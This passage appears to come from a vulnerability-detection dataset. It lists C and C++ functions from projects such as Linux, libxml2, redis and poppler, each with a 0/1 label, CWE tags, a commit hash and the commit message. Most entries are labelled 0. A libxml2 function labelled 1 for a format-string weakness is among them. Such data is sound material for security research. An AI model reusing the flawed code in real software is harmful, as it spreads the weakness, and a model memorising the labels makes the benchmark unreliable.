if (unlikely(!kaddrs))
return -ENOMEM;
if (__copy_from_user(kaddrs, addrs, addrs_size)) {
kfree(kaddrs);
return -EFAULT;
}
/* Walk through the addrs buffer and count the number of addresses. */
addr_buf = kaddrs;
while (walk_size < addrs_size) {
sa_addr = (struct sockaddr *)addr_buf;
af = sctp_get_af_specific(sa_addr->sa_family);
/* If the address family is not supported or if this address
* causes the address buffer to overflow return EINVAL.
*/
if (!af || (walk_size + af->sockaddr_len) > addrs_size) {
kfree(kaddrs);
return -EINVAL;
}
addrcnt++;
addr_buf += af->sockaddr_len;
walk_size += af->sockaddr_len;
}
/* Do the work. */
switch (op) {
case SCTP_BINDX_ADD_ADDR:
err = sctp_bindx_add(sk, kaddrs, addrcnt);
if (err)
goto out;
err = sctp_send_asconf_add_ip(sk, kaddrs, addrcnt);
break;
case SCTP_BINDX_REM_ADDR:
err = sctp_bindx_rem(sk, kaddrs, addrcnt);
if (err)
goto out;
err = sctp_send_asconf_del_ip(sk, kaddrs, addrcnt);
break;
default:
err = -EINVAL;
break;
}
out:
kfree(kaddrs);
return err;
}
| 0 |
[] |
linux-2.6
|
5e739d1752aca4e8f3e794d431503bfca3162df4
| 254,491,089,165,664,000,000,000,000,000,000,000,000 | 76 |
sctp: fix potential panics in the SCTP-AUTH API.
All of the SCTP-AUTH socket options could cause a panic
if the extension is disabled and the API is envoked.
Additionally, there were some additional assumptions that
certain pointers would always be valid which may not
always be the case.
This patch hardens the API and address all of the crash
scenarios.
Signed-off-by: Vlad Yasevich <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
ConnStateData::stopSending(const char *error)
{
debugs(33, 4, HERE << "sending error (" << clientConnection << "): " << error <<
"; old receiving error: " <<
(stoppedReceiving() ? stoppedReceiving_ : "none"));
if (const char *oldError = stoppedSending()) {
debugs(33, 3, HERE << "already stopped sending: " << oldError);
return; // nothing has changed as far as this connection is concerned
}
stoppedSending_ = error;
if (!stoppedReceiving()) {
if (const int64_t expecting = mayNeedToReadMoreBody()) {
debugs(33, 5, HERE << "must still read " << expecting <<
" request body bytes with " << inBuf.length() << " unused");
return; // wait for the request receiver to finish reading
}
}
clientConnection->close();
}
| 0 |
[
"CWE-444"
] |
squid
|
fd68382860633aca92065e6c343cfd1b12b126e7
| 40,585,957,388,874,897,000,000,000,000,000,000,000 | 22 |
Improve Transfer-Encoding handling (#702)
Reject messages containing Transfer-Encoding header with coding other
than chunked or identity. Squid does not support other codings.
For simplicity and security sake, also reject messages where
Transfer-Encoding contains unnecessary complex values that are
technically equivalent to "chunked" or "identity" (e.g., ",,chunked" or
"identity, chunked").
RFC 7230 formally deprecated and removed identity coding, but it is
still used by some agents.
|
static PHP_GINIT_FUNCTION(xml)
{
xml_globals->default_encoding = "UTF-8";
}
| 0 |
[
"CWE-787"
] |
php-src
|
7d163e8a0880ae8af2dd869071393e5dc07ef271
| 55,329,516,146,207,850,000,000,000,000,000,000,000 | 4 |
truncate results at depth of 255 to prevent corruption
|
_message_send_receipt(const char *const fulljid, const char *const message_id)
{
xmpp_ctx_t * const ctx = connection_get_ctx();
char *id = create_unique_id("receipt");
xmpp_stanza_t *message = xmpp_message_new(ctx, NULL, fulljid, id);
free(id);
xmpp_stanza_t *receipt = xmpp_stanza_new(ctx);
xmpp_stanza_set_name(receipt, "received");
xmpp_stanza_set_ns(receipt, STANZA_NS_RECEIPTS);
xmpp_stanza_set_id(receipt, message_id);
xmpp_stanza_add_child(message, receipt);
xmpp_stanza_release(receipt);
_send_message_stanza(message);
xmpp_stanza_release(message);
}
| 0 |
[
"CWE-20",
"CWE-346"
] |
profanity
|
8e75437a7e43d4c55e861691f74892e666e29b0b
| 229,754,311,861,433,500,000,000,000,000,000,000,000 | 19 |
Add carbons from check
|
struct kern_ipc_perm *ipcctl_pre_down(struct ipc_namespace *ns,
struct ipc_ids *ids, int id, int cmd,
struct ipc64_perm *perm, int extra_perm)
{
struct kern_ipc_perm *ipcp;
ipcp = ipcctl_pre_down_nolock(ns, ids, id, cmd, perm, extra_perm);
if (IS_ERR(ipcp))
goto out;
spin_lock(&ipcp->lock);
out:
return ipcp;
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
linux
|
6062a8dc0517bce23e3c2f7d2fea5e22411269a3
| 84,834,754,559,869,450,000,000,000,000,000,000,000 | 14 |
ipc,sem: fine grained locking for semtimedop
Introduce finer grained locking for semtimedop, to handle the common case
of a program wanting to manipulate one semaphore from an array with
multiple semaphores.
If the call is a semop manipulating just one semaphore in an array with
multiple semaphores, only take the lock for that semaphore itself.
If the call needs to manipulate multiple semaphores, or another caller is
in a transaction that manipulates multiple semaphores, the sem_array lock
is taken, as well as all the locks for the individual semaphores.
On a 24 CPU system, performance numbers with the semop-multi
test with N threads and N semaphores, look like this:
vanilla Davidlohr's Davidlohr's + Davidlohr's +
threads patches rwlock patches v3 patches
10 610652 726325 1783589 2142206
20 341570 365699 1520453 1977878
30 288102 307037 1498167 2037995
40 290714 305955 1612665 2256484
50 288620 312890 1733453 2650292
60 289987 306043 1649360 2388008
70 291298 306347 1723167 2717486
80 290948 305662 1729545 2763582
90 290996 306680 1736021 2757524
100 292243 306700 1773700 3059159
[[email protected]: do not call sem_lock when bogus sma]
[[email protected]: make refcounter atomic]
Signed-off-by: Rik van Riel <[email protected]>
Suggested-by: Linus Torvalds <[email protected]>
Acked-by: Davidlohr Bueso <[email protected]>
Cc: Chegu Vinod <[email protected]>
Cc: Jason Low <[email protected]>
Reviewed-by: Michel Lespinasse <[email protected]>
Cc: Peter Hurley <[email protected]>
Cc: Stanislav Kinsbursky <[email protected]>
Tested-by: Emmanuel Benisty <[email protected]>
Tested-by: Sedat Dilek <[email protected]>
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
int btrfs_ioctl_get_supported_features(void __user *arg)
{
static const struct btrfs_ioctl_feature_flags features[3] = {
INIT_FEATURE_FLAGS(SUPP),
INIT_FEATURE_FLAGS(SAFE_SET),
INIT_FEATURE_FLAGS(SAFE_CLEAR)
};
if (copy_to_user(arg, &features, sizeof(features)))
return -EFAULT;
return 0;
}
| 0 |
[
"CWE-476",
"CWE-284"
] |
linux
|
09ba3bc9dd150457c506e4661380a6183af651c1
| 261,444,287,984,716,200,000,000,000,000,000,000,000 | 13 |
btrfs: merge btrfs_find_device and find_device
Both btrfs_find_device() and find_device() does the same thing except
that the latter does not take the seed device onto account in the device
scanning context. We can merge them.
Signed-off-by: Anand Jain <[email protected]>
Reviewed-by: David Sterba <[email protected]>
Signed-off-by: David Sterba <[email protected]>
|
static void GetRootMeanSquarePixelList(PixelList *pixel_list,
MagickPixelPacket *pixel)
{
MagickRealType
sum;
register SkipList
*list;
register ssize_t
channel;
size_t
color;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the root mean square value for each of the color.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
count=0;
sum=0.0;
do
{
color=list->nodes[color].next[0];
sum+=(MagickRealType) (list->nodes[color].count*color*color);
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
sum/=pixel_list->length;
channels[channel]=(unsigned short) sqrt(sum);
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
ImageMagick6
|
91e58d967a92250439ede038ccfb0913a81e59fe
| 136,641,173,214,208,860,000,000,000,000,000,000,000 | 45 |
https://github.com/ImageMagick/ImageMagick/issues/1615
|
static inline void drop_fpu(struct task_struct *tsk)
{
/*
* Forget coprocessor state..
*/
preempt_disable();
tsk->thread.fpu_counter = 0;
__drop_fpu(tsk);
clear_used_math();
preempt_enable();
}
| 0 |
[
"CWE-284",
"CWE-264"
] |
linux
|
26bef1318adc1b3a530ecc807ef99346db2aa8b0
| 239,937,444,810,003,900,000,000,000,000,000,000,000 | 11 |
x86, fpu, amd: Clear exceptions in AMD FXSAVE workaround
Before we do an EMMS in the AMD FXSAVE information leak workaround we
need to clear any pending exceptions, otherwise we trap with a
floating-point exception inside this code.
Reported-by: halfdog <[email protected]>
Tested-by: Borislav Petkov <[email protected]>
Link: http://lkml.kernel.org/r/CA%2B55aFxQnY_PCG_n4=0w-VG=YLXL-yr7oMxyy0WU2gCBAf3ydg@mail.gmail.com
Signed-off-by: H. Peter Anvin <[email protected]>
|
bool vmx_interrupt_blocked(struct kvm_vcpu *vcpu)
{
if (is_guest_mode(vcpu) && nested_exit_on_intr(vcpu))
return false;
return !(vmx_get_rflags(vcpu) & X86_EFLAGS_IF) ||
(vmcs_read32(GUEST_INTERRUPTIBILITY_INFO) &
(GUEST_INTR_STATE_STI | GUEST_INTR_STATE_MOV_SS));
}
| 0 |
[
"CWE-787"
] |
linux
|
04c4f2ee3f68c9a4bf1653d15f1a9a435ae33f7a
| 177,415,953,467,357,200,000,000,000,000,000,000,000 | 9 |
KVM: VMX: Don't use vcpu->run->internal.ndata as an array index
__vmx_handle_exit() uses vcpu->run->internal.ndata as an index for
an array access. Since vcpu->run is (can be) mapped to a user address
space with a writer permission, the 'ndata' could be updated by the
user process at anytime (the user process can set it to outside the
bounds of the array).
So, it is not safe that __vmx_handle_exit() uses the 'ndata' that way.
Fixes: 1aa561b1a4c0 ("kvm: x86: Add "last CPU" to some KVM_EXIT information")
Signed-off-by: Reiji Watanabe <[email protected]>
Reviewed-by: Jim Mattson <[email protected]>
Message-Id: <[email protected]>
Cc: [email protected]
Signed-off-by: Paolo Bonzini <[email protected]>
|
nautilus_file_get_name (NautilusFile *file)
{
return g_strdup (eel_ref_str_peek (file->details->name));
}
| 0 |
[] |
nautilus
|
7632a3e13874a2c5e8988428ca913620a25df983
| 132,610,232,748,099,610,000,000,000,000,000,000,000 | 4 |
Check for trusted desktop file launchers.
2009-02-24 Alexander Larsson <[email protected]>
* libnautilus-private/nautilus-directory-async.c:
Check for trusted desktop file launchers.
* libnautilus-private/nautilus-file-private.h:
* libnautilus-private/nautilus-file.c:
* libnautilus-private/nautilus-file.h:
Add nautilus_file_is_trusted_link.
Allow unsetting of custom display name.
* libnautilus-private/nautilus-mime-actions.c:
Display dialog when trying to launch a non-trusted desktop file.
svn path=/trunk/; revision=15003
|
checkOpenEXRFile(const char* fileName, bool reduceMemory,bool reduceTime)
{
return runChecks( fileName , reduceMemory , reduceTime );
}
| 0 |
[
"CWE-787"
] |
openexr
|
ae6d203892cc9311917a7f4f05354ef792b3e58e
| 317,615,714,893,969,300,000,000,000,000,000,000,000 | 4 |
Handle xsampling and bad seekg() calls in exrcheck (#872)
* fix exrcheck xsampling!=1
Signed-off-by: Peter Hillman <[email protected]>
* fix handling bad seekg() calls in exrcheck
Signed-off-by: Peter Hillman <[email protected]>
* fix deeptile detection in multipart files
Signed-off-by: Peter Hillman <[email protected]>
|
bool git_path_does_fs_decompose_unicode(const char *root)
{
GIT_UNUSED(root);
return false;
}
| 0 |
[
"CWE-20",
"CWE-706"
] |
libgit2
|
3f7851eadca36a99627ad78cbe56a40d3776ed01
| 307,914,677,996,329,860,000,000,000,000,000,000,000 | 5 |
Disallow NTFS Alternate Data Stream attacks, even on Linux/macOS
A little-known feature of NTFS is that it offers to store metadata in
so-called "Alternate Data Streams" (inspired by Apple's "resource
forks") that are copied together with the file they are associated with.
These Alternate Data Streams can be accessed via `<file name>:<stream
name>:<stream type>`.
Directories, too, have Alternate Data Streams, and they even have a
default stream type `$INDEX_ALLOCATION`. Which means that `abc/` and
`abc::$INDEX_ALLOCATION/` are actually equivalent.
This is of course another attack vector on the Git directory that we
definitely want to prevent.
On Windows, we already do this incidentally, by disallowing colons in
file/directory names.
While it looks as if files'/directories' Alternate Data Streams are not
accessible in the Windows Subsystem for Linux, and neither via
CIFS/SMB-mounted network shares in Linux, it _is_ possible to access
them on SMB-mounted network shares on macOS.
Therefore, let's go the extra mile and prevent this particular attack
_everywhere_. To keep things simple, let's just disallow *any* Alternate
Data Stream of `.git`.
This is libgit2's variant of CVE-2019-1352.
Signed-off-by: Johannes Schindelin <[email protected]>
|
xmlZMemBuffExtend( xmlZMemBuffPtr buff, size_t ext_amt ) {
int rc = -1;
size_t new_size;
size_t cur_used;
unsigned char * tmp_ptr = NULL;
if ( buff == NULL )
return ( -1 );
else if ( ext_amt == 0 )
return ( 0 );
cur_used = buff->zctrl.next_out - buff->zbuff;
new_size = buff->size + ext_amt;
#ifdef DEBUG_HTTP
if ( cur_used > new_size )
xmlGenericError( xmlGenericErrorContext,
"xmlZMemBuffExtend: %s\n%s %d bytes.\n",
"Buffer overwrite detected during compressed memory",
"buffer extension. Overflowed by",
(cur_used - new_size ) );
#endif
tmp_ptr = xmlRealloc( buff->zbuff, new_size );
if ( tmp_ptr != NULL ) {
rc = 0;
buff->size = new_size;
buff->zbuff = tmp_ptr;
buff->zctrl.next_out = tmp_ptr + cur_used;
buff->zctrl.avail_out = new_size - cur_used;
}
else {
xmlChar msg[500];
xmlStrPrintf(msg, 500,
(const xmlChar *) "xmlZMemBuffExtend: %s %lu bytes.\n",
"Allocation failure extending output buffer to",
new_size );
xmlIOErr(XML_IO_WRITE, (const char *) msg);
}
return ( rc );
}
| 1 |
[
"CWE-134"
] |
libxml2
|
4472c3a5a5b516aaf59b89be602fbce52756c3e9
| 66,621,654,187,306,550,000,000,000,000,000,000,000 | 45 |
Fix some format string warnings with possible format string vulnerability
For https://bugzilla.gnome.org/show_bug.cgi?id=761029
Decorate every method in libxml2 with the appropriate
LIBXML_ATTR_FORMAT(fmt,args) macro and add some cleanups
following the reports.
|
hostkey_method_ssh_ecdsa_signv(LIBSSH2_SESSION * session,
unsigned char **signature,
size_t *signature_len,
int veccount,
const struct iovec datavec[],
void **abstract)
{
libssh2_ecdsa_ctx *ec_ctx = (libssh2_ecdsa_ctx *) (*abstract);
libssh2_curve_type type = _libssh2_ecdsa_key_get_curve_type(ec_ctx);
int ret = 0;
if(type == LIBSSH2_EC_CURVE_NISTP256) {
LIBSSH2_HOSTKEY_METHOD_EC_SIGNV_HASH(256);
}
else if(type == LIBSSH2_EC_CURVE_NISTP384) {
LIBSSH2_HOSTKEY_METHOD_EC_SIGNV_HASH(384);
}
else if(type == LIBSSH2_EC_CURVE_NISTP521) {
LIBSSH2_HOSTKEY_METHOD_EC_SIGNV_HASH(512);
}
else {
return -1;
}
return ret;
}
| 0 |
[
"CWE-787"
] |
libssh2
|
dc109a7f518757741590bb993c0c8412928ccec2
| 168,715,991,971,787,410,000,000,000,000,000,000,000 | 26 |
Security fixes (#315)
* Bounds checks
Fixes for CVEs
https://www.libssh2.org/CVE-2019-3863.html
https://www.libssh2.org/CVE-2019-3856.html
* Packet length bounds check
CVE
https://www.libssh2.org/CVE-2019-3855.html
* Response length check
CVE
https://www.libssh2.org/CVE-2019-3859.html
* Bounds check
CVE
https://www.libssh2.org/CVE-2019-3857.html
* Bounds checking
CVE
https://www.libssh2.org/CVE-2019-3859.html
and additional data validation
* Check bounds before reading into buffers
* Bounds checking
CVE
https://www.libssh2.org/CVE-2019-3859.html
* declare SIZE_MAX and UINT_MAX if needed
|
void mp_buf_free(lua_State *L, mp_buf *buf) {
mp_realloc(L, buf->b, buf->len + buf->free, 0); /* realloc to 0 = free */
mp_realloc(L, buf, sizeof(*buf), 0);
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
redis
|
52a00201fca331217c3b4b8b634f6a0f57d6b7d3
| 314,018,632,086,058,500,000,000,000,000,000,000,000 | 4 |
Security: fix Lua cmsgpack library stack overflow.
During an auditing effort, the Apple Vulnerability Research team discovered
a critical Redis security issue affecting the Lua scripting part of Redis.
-- Description of the problem
Several years ago I merged a pull request including many small changes at
the Lua MsgPack library (that originally I authored myself). The Pull
Request entered Redis in commit 90b6337c1, in 2014.
Unfortunately one of the changes included a variadic Lua function that
lacked the check for the available Lua C stack. As a result, calling the
"pack" MsgPack library function with a large number of arguments, results
into pushing into the Lua C stack a number of new values proportional to
the number of arguments the function was called with. The pushed values,
moreover, are controlled by untrusted user input.
This in turn causes stack smashing which we believe to be exploitable,
while not very deterministic, but it is likely that an exploit could be
created targeting specific versions of Redis executables. However at its
minimum the issue results in a DoS, crashing the Redis server.
-- Versions affected
Versions greater or equal to Redis 2.8.18 are affected.
-- Reproducing
Reproduce with this (based on the original reproduction script by
Apple security team):
https://gist.github.com/antirez/82445fcbea6d9b19f97014cc6cc79f8a
-- Verification of the fix
The fix was tested in the following way:
1) I checked that the problem is no longer observable running the trigger.
2) The Lua code was analyzed to understand the stack semantics, and that
actually enough stack is allocated in all the cases of mp_pack() calls.
3) The mp_pack() function was modified in order to show exactly what items
in the stack were being set, to make sure that there is no silent overflow
even after the fix.
-- Credits
Thank you to the Apple team and to the other persons that helped me
checking the patch and coordinating this communication.
|
static long kvm_s390_guest_sida_op(struct kvm_vcpu *vcpu,
struct kvm_s390_mem_op *mop)
{
void __user *uaddr = (void __user *)mop->buf;
int r = 0;
if (mop->flags || !mop->size)
return -EINVAL;
if (mop->size + mop->sida_offset < mop->size)
return -EINVAL;
if (mop->size + mop->sida_offset > sida_size(vcpu->arch.sie_block))
return -E2BIG;
switch (mop->op) {
case KVM_S390_MEMOP_SIDA_READ:
if (copy_to_user(uaddr, (void *)(sida_origin(vcpu->arch.sie_block) +
mop->sida_offset), mop->size))
r = -EFAULT;
break;
case KVM_S390_MEMOP_SIDA_WRITE:
if (copy_from_user((void *)(sida_origin(vcpu->arch.sie_block) +
mop->sida_offset), uaddr, mop->size))
r = -EFAULT;
break;
}
return r;
}
| 0 |
[
"CWE-416"
] |
linux
|
0774a964ef561b7170d8d1b1bfe6f88002b6d219
| 116,578,996,635,341,920,000,000,000,000,000,000,000 | 28 |
KVM: Fix out of range accesses to memslots
Reset the LRU slot if it becomes invalid when deleting a memslot to fix
an out-of-bounds/use-after-free access when searching through memslots.
Explicitly check for there being no used slots in search_memslots(), and
in the caller of s390's approximation variant.
Fixes: 36947254e5f9 ("KVM: Dynamically size memslot array based on number of used slots")
Reported-by: Qian Cai <[email protected]>
Cc: Peter Xu <[email protected]>
Signed-off-by: Sean Christopherson <[email protected]>
Message-Id: <[email protected]>
Acked-by: Christian Borntraeger <[email protected]>
Signed-off-by: Paolo Bonzini <[email protected]>
|
Sequence(std::vector<std::shared_ptr<Ope>> &&opes) : opes_(opes) {}
| 0 |
[
"CWE-125"
] |
cpp-peglib
|
b3b29ce8f3acf3a32733d930105a17d7b0ba347e
| 771,277,851,122,894,000,000,000,000,000,000,000 | 1 |
Fix #122
|
static const char* format_s() { return "%s"; }
| 0 |
[
"CWE-125"
] |
CImg
|
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
| 221,818,253,125,505,400,000,000,000,000,000,000,000 | 1 |
Fix other issues in 'CImg<T>::load_bmp()'.
|
static struct sock *llc_lookup_dgram(struct llc_sap *sap,
const struct llc_addr *laddr)
{
struct sock *rc;
struct hlist_nulls_node *node;
int slot = llc_sk_laddr_hashfn(sap, laddr);
struct hlist_nulls_head *laddr_hb = &sap->sk_laddr_hash[slot];
rcu_read_lock_bh();
again:
sk_nulls_for_each_rcu(rc, node, laddr_hb) {
if (llc_dgram_match(sap, laddr, rc)) {
/* Extra checks required by SLAB_DESTROY_BY_RCU */
if (unlikely(!atomic_inc_not_zero(&rc->sk_refcnt)))
goto again;
if (unlikely(llc_sk(rc)->sap != sap ||
!llc_dgram_match(sap, laddr, rc))) {
sock_put(rc);
continue;
}
goto found;
}
}
rc = NULL;
/*
* if the nulls value we got at the end of this lookup is
* not the expected one, we must restart lookup.
* We probably met an item that was moved to another chain.
*/
if (unlikely(get_nulls_value(node) != slot))
goto again;
found:
rcu_read_unlock_bh();
return rc;
}
| 0 |
[
"CWE-20",
"CWE-401"
] |
linux
|
8b74d439e1697110c5e5c600643e823eb1dd0762
| 95,772,579,997,729,260,000,000,000,000,000,000,000 | 35 |
net/llc: avoid BUG_ON() in skb_orphan()
It seems nobody used LLC since linux-3.12.
Fortunately fuzzers like syzkaller still know how to run this code,
otherwise it would be no fun.
Setting skb->sk without skb->destructor leads to all kinds of
bugs, we now prefer to be very strict about it.
Ideally here we would use skb_set_owner() but this helper does not exist yet,
only CAN seems to have a private helper for that.
Fixes: 376c7311bdb6 ("net: add a temporary sanity check in skb_orphan()")
Signed-off-by: Eric Dumazet <[email protected]>
Reported-by: Andrey Konovalov <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
void PSOutputDev::cvtFunction(Function *func) {
SampledFunction *func0;
ExponentialFunction *func2;
StitchingFunction *func3;
PostScriptFunction *func4;
int thisFunc, m, n, nSamples, i, j, k;
switch (func->getType()) {
case -1: // identity
writePS("{}\n");
break;
case 0: // sampled
func0 = (SampledFunction *)func;
thisFunc = nextFunc++;
m = func0->getInputSize();
n = func0->getOutputSize();
nSamples = n;
for (i = 0; i < m; ++i) {
nSamples *= func0->getSampleSize(i);
}
writePSFmt("/xpdfSamples{0:d} [\n", thisFunc);
for (i = 0; i < nSamples; ++i) {
writePSFmt("{0:.6g}\n", func0->getSamples()[i]);
}
writePS("] def\n");
writePSFmt("{{ {0:d} array {1:d} array {2:d} 2 roll\n", 2*m, m, m+2);
// [e01] [efrac] x0 x1 ... xm-1
for (i = m-1; i >= 0; --i) {
// [e01] [efrac] x0 x1 ... xi
writePSFmt("{0:.6g} sub {1:.6g} mul {2:.6g} add\n",
func0->getDomainMin(i),
(func0->getEncodeMax(i) - func0->getEncodeMin(i)) /
(func0->getDomainMax(i) - func0->getDomainMin(i)),
func0->getEncodeMin(i));
// [e01] [efrac] x0 x1 ... xi-1 xi'
writePSFmt("dup 0 lt {{ pop 0 }} {{ dup {0:d} gt {{ pop {1:d} }} if }} ifelse\n",
func0->getSampleSize(i) - 1, func0->getSampleSize(i) - 1);
// [e01] [efrac] x0 x1 ... xi-1 xi'
writePS("dup floor cvi exch dup ceiling cvi exch 2 index sub\n");
// [e01] [efrac] x0 x1 ... xi-1 floor(xi') ceiling(xi') xi'-floor(xi')
writePSFmt("{0:d} index {1:d} 3 2 roll put\n", i+3, i);
// [e01] [efrac] x0 x1 ... xi-1 floor(xi') ceiling(xi')
writePSFmt("{0:d} index {1:d} 3 2 roll put\n", i+3, 2*i+1);
// [e01] [efrac] x0 x1 ... xi-1 floor(xi')
writePSFmt("{0:d} index {1:d} 3 2 roll put\n", i+2, 2*i);
// [e01] [efrac] x0 x1 ... xi-1
}
// [e01] [efrac]
for (i = 0; i < n; ++i) {
// [e01] [efrac] y(0) ... y(i-1)
for (j = 0; j < (1<<m); ++j) {
// [e01] [efrac] y(0) ... y(i-1) s(0) s(1) ... s(j-1)
writePSFmt("xpdfSamples{0:d}\n", thisFunc);
k = m - 1;
writePSFmt("{0:d} index {1:d} get\n", i+j+2, 2 * k + ((j >> k) & 1));
for (k = m - 2; k >= 0; --k) {
writePSFmt("{0:d} mul {1:d} index {2:d} get add\n",
func0->getSampleSize(k),
i + j + 3,
2 * k + ((j >> k) & 1));
}
if (n > 1) {
writePSFmt("{0:d} mul {1:d} add ", n, i);
}
writePS("get\n");
}
// [e01] [efrac] y(0) ... y(i-1) s(0) s(1) ... s(2^m-1)
for (j = 0; j < m; ++j) {
// [e01] [efrac] y(0) ... y(i-1) s(0) s(1) ... s(2^(m-j)-1)
for (k = 0; k < (1 << (m - j)); k += 2) {
// [e01] [efrac] y(0) ... y(i-1) <k/2 s' values> <2^(m-j)-k s values>
writePSFmt("{0:d} index {1:d} get dup\n",
i + k/2 + (1 << (m-j)) - k, j);
writePS("3 2 roll mul exch 1 exch sub 3 2 roll mul add\n");
writePSFmt("{0:d} 1 roll\n", k/2 + (1 << (m-j)) - k - 1);
}
// [e01] [efrac] s'(0) s'(1) ... s(2^(m-j-1)-1)
}
// [e01] [efrac] y(0) ... y(i-1) s
writePSFmt("{0:.6g} mul {1:.6g} add\n",
func0->getDecodeMax(i) - func0->getDecodeMin(i),
func0->getDecodeMin(i));
writePSFmt("dup {0:.6g} lt {{ pop {1:.6g} }} {{ dup {2:.6g} gt {{ pop {3:.6g} }} if }} ifelse\n",
func0->getRangeMin(i), func0->getRangeMin(i),
func0->getRangeMax(i), func0->getRangeMax(i));
// [e01] [efrac] y(0) ... y(i-1) y(i)
}
// [e01] [efrac] y(0) ... y(n-1)
writePSFmt("{0:d} {1:d} roll pop pop }}\n", n+2, n);
break;
case 2: // exponential
func2 = (ExponentialFunction *)func;
n = func2->getOutputSize();
writePSFmt("{{ dup {0:.6g} lt {{ pop {1:.6g} }} {{ dup {2:.6g} gt {{ pop {3:.6g} }} if }} ifelse\n",
func2->getDomainMin(0), func2->getDomainMin(0),
func2->getDomainMax(0), func2->getDomainMax(0));
// x
for (i = 0; i < n; ++i) {
// x y(0) .. y(i-1)
writePSFmt("{0:d} index {1:.6g} exp {2:.6g} mul {3:.6g} add\n",
i, func2->getE(), func2->getC1()[i] - func2->getC0()[i],
func2->getC0()[i]);
if (func2->getHasRange()) {
writePSFmt("dup {0:.6g} lt {{ pop {1:.6g} }} {{ dup {2:.6g} gt {{ pop {3:.6g} }} if }} ifelse\n",
func2->getRangeMin(i), func2->getRangeMin(i),
func2->getRangeMax(i), func2->getRangeMax(i));
}
}
// x y(0) .. y(n-1)
writePSFmt("{0:d} {1:d} roll pop }}\n", n+1, n);
break;
case 3: // stitching
func3 = (StitchingFunction *)func;
thisFunc = nextFunc++;
for (i = 0; i < func3->getNumFuncs(); ++i) {
cvtFunction(func3->getFunc(i));
writePSFmt("/xpdfFunc{0:d}_{1:d} exch def\n", thisFunc, i);
}
writePSFmt("{{ dup {0:.6g} lt {{ pop {1:.6g} }} {{ dup {2:.6g} gt {{ pop {3:.6g} }} if }} ifelse\n",
func3->getDomainMin(0), func3->getDomainMin(0),
func3->getDomainMax(0), func3->getDomainMax(0));
for (i = 0; i < func3->getNumFuncs() - 1; ++i) {
writePSFmt("dup {0:.6g} lt {{ {1:.6g} sub {2:.6g} mul {3:.6g} add xpdfFunc{4:d}_{5:d} }} {{\n",
func3->getBounds()[i+1],
func3->getBounds()[i],
func3->getScale()[i],
func3->getEncode()[2*i],
thisFunc, i);
}
writePSFmt("{0:.6g} sub {1:.6g} mul {2:.6g} add xpdfFunc{3:d}_{4:d}\n",
func3->getBounds()[i],
func3->getScale()[i],
func3->getEncode()[2*i],
thisFunc, i);
for (i = 0; i < func3->getNumFuncs() - 1; ++i) {
writePS("} ifelse\n");
}
writePS("}\n");
break;
case 4: // PostScript
func4 = (PostScriptFunction *)func;
writePS(func4->getCodeString()->getCString());
writePS("\n");
break;
}
}
| 0 |
[] |
poppler
|
abf167af8b15e5f3b510275ce619e6fdb42edd40
| 135,564,037,139,989,370,000,000,000,000,000,000,000 | 151 |
Implement tiling/patterns in SplashOutputDev
Fixes bug 13518
|
const char * cli_get_last_virus_str(const cli_ctx * ctx)
{
const char * ret;
if ((ret = cli_get_last_virus(ctx)))
return ret;
return "";
}
| 0 |
[] |
clamav-devel
|
167c0079292814ec5523d0b97a9e1b002bf8819b
| 75,222,859,842,360,630,000,000,000,000,000,000,000 | 7 |
fix 0.99.3 false negative of virus Pdf.Exploit.CVE_2016_1046-1.
|
perf_lock_task_context(struct task_struct *task, int ctxn, unsigned long *flags)
{
struct perf_event_context *ctx;
retry:
/*
* One of the few rules of preemptible RCU is that one cannot do
* rcu_read_unlock() while holding a scheduler (or nested) lock when
* part of the read side critical section was irqs-enabled -- see
* rcu_read_unlock_special().
*
* Since ctx->lock nests under rq->lock we must ensure the entire read
* side critical section has interrupts disabled.
*/
local_irq_save(*flags);
rcu_read_lock();
ctx = rcu_dereference(task->perf_event_ctxp[ctxn]);
if (ctx) {
/*
* If this context is a clone of another, it might
* get swapped for another underneath us by
* perf_event_task_sched_out, though the
* rcu_read_lock() protects us from any context
* getting freed. Lock the context and check if it
* got swapped before we could get the lock, and retry
* if so. If we locked the right context, then it
* can't get swapped on us any more.
*/
raw_spin_lock(&ctx->lock);
if (ctx != rcu_dereference(task->perf_event_ctxp[ctxn])) {
raw_spin_unlock(&ctx->lock);
rcu_read_unlock();
local_irq_restore(*flags);
goto retry;
}
if (ctx->task == TASK_TOMBSTONE ||
!atomic_inc_not_zero(&ctx->refcount)) {
raw_spin_unlock(&ctx->lock);
ctx = NULL;
} else {
WARN_ON_ONCE(ctx->task != task);
}
}
rcu_read_unlock();
if (!ctx)
local_irq_restore(*flags);
return ctx;
}
| 0 |
[
"CWE-362",
"CWE-125"
] |
linux
|
321027c1fe77f892f4ea07846aeae08cefbbb290
| 53,432,108,112,823,630,000,000,000,000,000,000,000 | 49 |
perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race
Di Shen reported a race between two concurrent sys_perf_event_open()
calls where both try and move the same pre-existing software group
into a hardware context.
The problem is exactly that described in commit:
f63a8daa5812 ("perf: Fix event->ctx locking")
... where, while we wait for a ctx->mutex acquisition, the event->ctx
relation can have changed under us.
That very same commit failed to recognise sys_perf_event_context() as an
external access vector to the events and thereby didn't apply the
established locking rules correctly.
So while one sys_perf_event_open() call is stuck waiting on
mutex_lock_double(), the other (which owns said locks) moves the group
about. So by the time the former sys_perf_event_open() acquires the
locks, the context we've acquired is stale (and possibly dead).
Apply the established locking rules as per perf_event_ctx_lock_nested()
to the mutex_lock_double() for the 'move_group' case. This obviously means
we need to validate state after we acquire the locks.
Reported-by: Di Shen (Keen Lab)
Tested-by: John Dias <[email protected]>
Signed-off-by: Peter Zijlstra (Intel) <[email protected]>
